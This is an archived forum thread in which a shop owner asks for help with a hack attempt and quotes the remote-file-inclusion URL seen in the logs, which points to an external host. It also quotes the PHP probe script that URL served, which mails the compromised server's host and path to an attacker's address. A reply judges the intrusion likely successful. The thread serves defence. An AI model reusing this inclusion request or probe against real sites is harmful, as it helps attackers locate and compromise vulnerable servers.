PDA

View Full Version : Hack Attempt



stewartm
06-24-2010, 11:57 AM
Just found this being used on my site:

URL used:

/catalog/index.php?cName=http://www.lussts.xpg.com.br/tester.txt

Contents of URL:


<?php
//=================================
//
// scan inb0x hotmail v1.0
//
// coded by FilhOte_Ccs and LOST
// nao rippem fdps :]
//
//
// Hacker Group 2007
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "$user";
$assunto = "now-env";
$email1 = "[email protected]";
$headers = "From: <$email>rn";


if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "Opa, enviado!";
exit();
}
else{
echo "Nao enviei..";
exit();
}
?>



Should I be worried and how can I tell if the attempt is succesful?

Thanks

ridexbuilder
06-24-2010, 11:27 PM
Should I be worried and how can I tell if the attempt is succesful?

Eh, yes, I should think so! :rolleyes:
Regardless of the payload, it was successful in that it got in there in the first place.
Have a look at the 'Max wiki on tightening security - same principles apply.